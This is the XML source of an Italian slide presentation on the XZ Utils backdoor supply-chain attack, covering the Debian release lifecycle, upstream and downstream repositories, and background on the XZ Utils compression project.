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8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5" r:id="rId10"/>
    <p:sldId id="264" r:id="rId11"/>
    <p:sldId id="266" r:id="rId12"/>
    <p:sldId id="268" r:id="rId13"/>
    <p:sldId id="269" r:id="rId14"/>
    <p:sldId id="270" r:id="rId15"/>
    <p:sldId id="279" r:id="rId16"/>
    <p:sldId id="271" r:id="rId17"/>
    <p:sldId id="272" r:id="rId18"/>
    <p:sldId id="273" r:id="rId19"/>
    <p:sldId id="274" r:id="rId20"/>
    <p:sldId id="276" r:id="rId21"/>
    <p:sldId id="277" r:id="rId22"/>
    <p:sldId id="283" r:id="rId23"/>
    <p:sldId id="278" r:id="rId24"/>
    <p:sldId id="280" r:id="rId25"/>
    <p:sldId id="281" r:id="rId26"/>
    <p:sldId id="282" r:id="rId27"/>
    <p:sldId id="284" r:id="rId28"/>
    <p:sldId id="364" r:id="rId29"/>
    <p:sldId id="285" r:id="rId30"/>
    <p:sldId id="286" r:id="rId31"/>
    <p:sldId id="288" r:id="rId32"/>
    <p:sldId id="292" r:id="rId33"/>
    <p:sldId id="289" r:id="rId34"/>
    <p:sldId id="291" r:id="rId35"/>
    <p:sldId id="294" r:id="rId36"/>
    <p:sldId id="295" r:id="rId37"/>
    <p:sldId id="297" r:id="rId38"/>
    <p:sldId id="296" r:id="rId39"/>
    <p:sldId id="298" r:id="rId40"/>
    <p:sldId id="299" r:id="rId41"/>
    <p:sldId id="300" r:id="rId42"/>
    <p:sldId id="301" r:id="rId43"/>
    <p:sldId id="303" r:id="rId44"/>
    <p:sldId id="304" r:id="rId45"/>
    <p:sldId id="305" r:id="rId46"/>
    <p:sldId id="306" r:id="rId47"/>
    <p:sldId id="307" r:id="rId48"/>
    <p:sldId id="309" r:id="rId49"/>
    <p:sldId id="310" r:id="rId50"/>
    <p:sldId id="314" r:id="rId51"/>
    <p:sldId id="315" r:id="rId52"/>
    <p:sldId id="316" r:id="rId53"/>
    <p:sldId id="319" r:id="rId54"/>
    <p:sldId id="318" r:id="rId55"/>
    <p:sldId id="327" r:id="rId56"/>
    <p:sldId id="320" r:id="rId57"/>
    <p:sldId id="321" r:id="rId58"/>
    <p:sldId id="324" r:id="rId59"/>
    <p:sldId id="323" r:id="rId60"/>
    <p:sldId id="325" r:id="rId61"/>
    <p:sldId id="328" r:id="rId62"/>
    <p:sldId id="326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29" r:id="rId72"/>
    <p:sldId id="330" r:id="rId73"/>
    <p:sldId id="339" r:id="rId74"/>
    <p:sldId id="340" r:id="rId75"/>
    <p:sldId id="341" r:id="rId76"/>
    <p:sldId id="317" r:id="rId77"/>
    <p:sldId id="344" r:id="rId78"/>
    <p:sldId id="342" r:id="rId79"/>
    <p:sldId id="345" r:id="rId80"/>
    <p:sldId id="346" r:id="rId81"/>
    <p:sldId id="347" r:id="rId82"/>
    <p:sldId id="348" r:id="rId83"/>
    <p:sldId id="349" r:id="rId84"/>
    <p:sldId id="350" r:id="rId85"/>
    <p:sldId id="352" r:id="rId86"/>
    <p:sldId id="351" r:id="rId87"/>
    <p:sldId id="353" r:id="rId88"/>
    <p:sldId id="354" r:id="rId89"/>
    <p:sldId id="356" r:id="rId90"/>
    <p:sldId id="355" r:id="rId91"/>
    <p:sldId id="360" r:id="rId92"/>
    <p:sldId id="359" r:id="rId93"/>
    <p:sldId id="357" r:id="rId94"/>
    <p:sldId id="358" r:id="rId95"/>
    <p:sldId id="365" r:id="rId96"/>
    <p:sldId id="361" r:id="rId97"/>
    <p:sldId id="363" r:id="rId98"/>
    <p:sldId id="366" r:id="rId99"/>
    <p:sldId id="368" r:id="rId100"/>
    <p:sldId id="369" r:id="rId101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46A4C1-76C5-412E-B1C7-3F5078274606}" v="23" dt="2024-05-26T21:17:23.658"/>
    <p1510:client id="{49A645B1-0216-497A-8C7C-AEFE904894B7}" v="102" dt="2024-05-26T09:09:07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2DBAD29-1E10-4643-A6A5-373BB0BCEC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338AFC5-7E1F-4CC0-BEAA-8D2CB102A3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7A0E7-4614-4857-B637-5A4950B76003}" type="datetimeFigureOut">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>26/05/2024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98A602-2F16-4C08-8327-9660DE46DA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7111D1B-6254-49F7-8F5E-A511EAC9CC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8CF00-6DC0-4791-8596-ECA56005A7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42658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A4D91-B313-40C5-B2EB-A6D7D5B8A17F}" type="datetimeFigureOut">
              <a:rPr lang="it-IT" noProof="0" smtClean="0"/>
              <a:t>26/05/2024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Fare clic per modificare lo stile del titolo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0ACA1-9413-4232-AD57-0C0C34D55BA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405133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0ACA1-9413-4232-AD57-0C0C34D55BA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0095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76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79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0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95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81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5/26/2024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46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5/26/2024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7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5/26/2024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10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68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57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478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>
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="3840">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" pos="7200">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="6720">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="16" pos="480">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="23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temd/systemd/issues/32028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security@debian.or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file:///\\n\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\\$V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180965" y="360706"/>
            <a:ext cx="6640884" cy="3240079"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" sz="3600">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>XZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3600" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>UtilS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3600">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> Backdoor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176266" y="3607984"/>
            <a:ext cx="6639076" cy="22666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it-IT"/>
              <a:t>Linux Supply Chain Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Giorgio Chirico</a:t>
            </a:r>
          </a:p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C130A0F-F6EB-60D6-2AB8-B3C7DFD09691}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="842380" y="3601648"/>
            <a:ext cx="1950906" cy="11922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7200"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Immagine che contiene disegno, schizzo, clipart, cappello&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C636502-D499-2821-1FF7-64394816D6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0" r="560" b="12885"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="586509" y="498230"/>
            <a:ext cx="4091746" cy="357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12832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Introduzione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10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92366" y="1984887"/>
            <a:ext cx="6761444" cy="41672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Linux Software Release </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LifeCycle</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="3200" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Esempio, integrazione di una libreria di terze parti in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="200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0"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="200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it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stadio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Experimental</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: progetto caricato su piattaforma;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="0"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="200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it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stadio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unstable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(o "cutting-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>edge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>maintainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> compila un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>initial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> package da inviare al server ftp dove gli </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ftpmasters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> revisionano (soprattutto) il Source Code, collaborando col </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>maintainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="0"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="200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it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Migration to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: package viene incluso in una distribuzione di testing;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="0"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="200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it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stadio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: maturazione package completa, viene incluso in una versione stabile della </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>distro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="20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Immagine 2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1078966B-BBD4-730B-D54D-1C65CB0D1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587" y="1457633"/>
            <a:ext cx="5201684" cy="54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836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Cosa sappiamo oggi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100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rgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Il microcosmo delle interazioni nei progetti open-source</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Questo articolo di Rob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mensching</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (titolo della slide) riassume tutto l'incidente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz-utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in una frase:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D1D1B"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Original</a:t>
            </a:r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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>maintainer</a:t>
            </a:r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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>burns</a:t>
            </a:r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 out, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>only</a:t>
            </a:r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 the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>offers</a:t>
            </a:r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 to help </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="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(so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>inherits</a:t>
            </a:r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 trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>built</a:t>
            </a:r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 up by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>original</a:t>
            </a:r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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>maintainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>)"</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D1D1B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>La mailing list di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> è un microcosmo delle interazioni nei progetti Open Source. I consumatori fanno richieste (alcuni educati, altri meno) a un manutentore (raramente due) che fa tutto.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4166343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12832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Introduzione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11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92366" y="1984887"/>
            <a:ext cx="12201662" cy="2739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Linux Software Release </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LifeCycle</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="20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Da un punto di vista più generico, si distinguono due </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>branch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Upstream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: repository originaria, gestita dai </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>maintainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> del componente;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Downstream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: repository derivata, in uso dagli </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ftpmasters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> della specifica </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>distro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</p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6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B434D7C0-CFAA-DA99-CD65-240C9D523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268" y="4070576"/>
            <a:ext cx="5456216" cy="278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7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Introduzione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12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84887"/>
            <a:ext cx="11866844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XZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Utils</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err="1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Progetto open-source nato nel 2009 e mantenuto principalmente da Lasse Collin, fondatore di The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tukaani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Project. Tale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utility è dedicata a sistemi Unix-like e, dalla sua versione 5.0.0, anche a Windows.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XZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> è costituito da un set di software per la compressione lossless in formati:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: formato "legacy" per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>compatilibità</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> con la LZMA-SDK di 7-Zip;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: formato nativo, caratterizzato da un alto rateo di compressione.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene cartone animato, uccello&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAFFAED1-6209-67FF-0517-2FD9BD05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5189394"/>
            <a:ext cx="29337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70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6" y="3300"/>
            <a:ext cx="10524739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Introduzione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13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84887"/>
            <a:ext cx="1186684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XZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
